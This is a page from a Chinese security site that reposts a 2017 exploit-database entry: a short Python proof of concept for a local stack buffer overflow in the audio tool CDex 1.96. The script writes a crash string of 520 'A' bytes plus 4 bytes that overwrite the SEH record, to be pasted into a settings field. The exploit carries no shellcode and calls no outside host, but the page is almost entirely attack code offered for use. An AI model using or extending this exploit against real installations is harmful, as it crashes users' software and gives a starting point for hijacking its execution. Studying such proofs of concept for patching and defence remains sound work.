首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CDex 1.96 - Buffer Overflow
来源:@bzyo_ 作者:bzyo 发布时间:2017-12-19  
#!/usr/bin/python
 
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: CDex 1.96  - Local Stack Buffer Overflow
# Date: 17-12-2017
# Vulnerable Software: CDex 1.96 (Unicode Build)
# Vendor Homepage: http://cdex.mu/
# Version: v1.96
# Software Link: http://cdex.mu/?q=download
# Tested On: Windows 7 x32
#
#
# PoC: generate crash.txt, open app, go to options, settings, encoding, tags, paste crash.txt contents in picture text
#
# app crashes; 00420042 Pointer to next SEH record; no unicode ppr pointers
#
 
 
file="crash.txt"
 
crash = "A"*520 + "B"*4         #seh
 
writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux kernel < 4.10.15 - Race
·Outlook for Android - Attachme
·Sync Breeze 10.2.12 - Denial o
·GoAhead httpd 2.5 < 3.6.5 - 'L
·ITGuard-Manager 0.0.0.1 - Remo
·Linksys WVBR0 - 'User-Agent' R
·Western Digital MyCloud multi_
·WIndows jscript!JsArraySlice U
·Microsoft Office DDE Payload D
·Microsoft Windows jscript!RegE
·Dup Scout Enterprise 10.0.18 B
·Windows jscript!NameTbl::GetVa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved